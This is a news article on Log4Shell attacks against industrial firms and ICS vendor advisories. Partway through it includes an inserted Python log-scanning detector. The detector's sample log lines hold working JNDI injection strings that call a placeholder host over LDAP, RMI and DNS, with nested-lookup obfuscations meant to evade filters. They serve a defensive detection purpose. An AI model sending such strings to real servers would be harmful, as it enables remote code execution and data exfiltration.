
Industrial Organizations Targeted in Log4Shell Attacks

Log4Shell attacks target industrial companies

Industrial organizations are exposed to attacks leveraging a recently disclosed — and already exploited — vulnerability affecting the widely used Log4j logging utility.


Industrial cybersecurity firm Dragos reported on Monday that it has observed both attempted and successful exploitation of the vulnerability, and the company says it has already coordinated the takedown of a malicious domain used in attacks.

The critical vulnerability, tracked as CVE-2021-44228 and dubbed Log4Shell and LogJam, came to light in late November, and it was patched on December 6. Evidence suggests that exploitation of the vulnerability may have started on December 1, but mass exploitation began around December 9, after weaponized proof-of-concept (PoC) exploits were made available.

Apache Log4j is a Java-based logging tool that is included in various open source libraries, and is directly embedded in many popular software applications.

A security hole affecting the cross-platform library, specifically its Java Naming and Directory Interface (JNDI) lookup feature, can be exploited for remote code execution by getting the targeted system to log a specially crafted string.

Many threat groups have exploited the vulnerability — which can be used to take complete control of a system — to deliver various types of malware.

“This cross-cutting vulnerability, which is both vendor agnostic and affects both proprietary and open-source software, will leave a wide swathe of industries exposed to remote exploitation, to include electric power, water, food and beverage, manufacturing, transportation, and more,” Dragos said.

“Log4j is found in popular open-source repositories used in numerous industrial applications, such as Object Linking and Embedding for Process Control (OPC) Foundation’s Unified Architecture (UA) Java Legacy. Additionally, adversaries can leverage this vulnerability in proprietary Supervisory Control and Data Acquisition (SCADA) and Energy Management Systems (EMS) which make use of Java in their codebase,” it added.

The company noted that while the Lightweight Directory Access Protocol (LDAP) has been the primary attack vector, it has also observed attack attempts leveraging DNS and Remote Method Invocation (RMI).
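The two paragraphs above describe the mechanism (a logged string carrying a JNDI lookup) and the lookup schemes Dragos saw in the wild (LDAP, plus DNS and RMI). The following is an added example, not code from the article, Dragos, or any vendor: a small Python detector that scans web-server log lines for the `${jndi:...}` lookup, reports which scheme it points at, and first collapses the nested-lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`) that defeat a plain substring search for `${jndi:`. The log lines and the `lookup.example.invalid` hostname are constructed for the example; only the `lower`/`upper` and `:-` default-value forms are unwrapped, and any other lookup is left in place.

```python
"""Log4Shell lookup detector for log lines (added example, not from the article).

Collapses nested Log4j lookups so that an obfuscated ${jndi:...} string
becomes visible, then reports the scheme (ldap, rmi, dns, ...) it targets.
"""
import re
from typing import Dict, List, Optional

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# A JNDI lookup followed by its URL scheme, after normalisation + lower-casing.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:")

_MAX_ROUNDS = 20  # guards against pathological nesting depth


def _reduce_one(match: "re.Match") -> str:
    """Collapse one innermost lookup to the literal it would evaluate to."""
    body = match.group(1).strip()
    if body.startswith("jndi:"):
        return match.group(0)              # keep the lookup we want to detect
    if ":-" in body:                       # ${env:NOPE:-j} or ${::-j} -> "j"
        return body.rsplit(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix in ("lower", "upper"):   # ${lower:J} -> "j"
        return value.lower()
    return match.group(0)                  # unknown lookup: leave untouched


def normalize(line: str) -> str:
    """Lower-case the line and collapse nested lookups until nothing changes."""
    text = line.lower()
    for _ in range(_MAX_ROUNDS):
        reduced = _INNERMOST.sub(_reduce_one, text)
        if reduced == text:
            break
        text = reduced
    return text


def scan_line(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for one log line, or None if no JNDI lookup is present."""
    normalized = normalize(line)
    m = _JNDI.search(normalized)
    if not m:
        return None
    return {
        "scheme": m.group(1),
        # True when the raw line hid the lookup behind nested expressions
        "obfuscated": "${jndi:" not in line.lower(),
        "normalized": normalized[m.start():m.start() + 80],
    }


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan a list of log lines; return findings with 1-based line numbers."""
    findings = []
    for number, line in enumerate(lines, 1):
        finding = scan_line(line)
        if finding:
            finding["line"] = number
            findings.append(finding)
    return findings


# Constructed sample access-log lines (hostnames are placeholders).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://lookup.example.invalid:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:15:21 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:r}mi://lookup.example.invalid:1099/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:16:02 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:'
    'dns://${hostName}.lookup.example.invalid/a HTTP/1.1" 404 0',
    '10.0.0.7 - - [10/Dec/2021:03:17:40 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 1024 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: scheme={f['scheme']} obfuscated={f['obfuscated']} -> {f['normalized']}")
```

Run against the constructed sample, lines 2, 3 and 4 are flagged with schemes `ldap`, `rmi` and `dns`, lines 3 and 4 are marked as obfuscated, and the benign `${date:yyyy}` lookup on line 5 is ignored. The same normalisation is what makes a substring rule in a SIEM miss these variants, so a detection built only on the literal `${jndi:` should be treated as a first, not a last, line of defence.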

Dragos pointed out that robust segmentation of the IT/OT networks significantly reduces the risk of impact on industrial systems, but the company warned that threat actors may develop more sophisticated Log4Shell exploits once network defenders address the easier exploit paths.

ICS vendors respond to Log4Shell

Industrial control system (ICS) manufacturers have started responding to Log4Shell.

As of Monday night, Siemens had confirmed that 17 of its products are affected by CVE-2021-44228, and many more were still being analyzed. The German industrial giant has started releasing patches and has provided mitigation advice.

Products confirmed to be affected include E-Car OC, EnergyIP, Geolus, Industrial Edge Management, Logo! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, Simatic WinCC, SiPass, Siveillance, Solid Edge, and Spectrum Power.

Schneider Electric has also released an advisory, but it’s still working on determining which of its products are affected. In the meantime, it has shared general mitigations to reduce the risk of attacks.

Inductive Automation, which provides SCADA software and industrial automation solutions, told customers that it has conducted a full audit and determined that its products are not impacted.

“Software vendors in the OT space are in a unique position to help their clients by ideally having tabs on their software, but also within environments they help maintain (e.g. service agreement),” Ron Brash, VP of technical research at aDolus Technology, told SecurityWeek.

“Unfortunately, there are varying levels of component awareness when it comes to vendor supply chain security, and this is particularly problematic for current and past products where accurate component inventories are lacking or source code/build chains are poorly understood,” Brash said.


Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
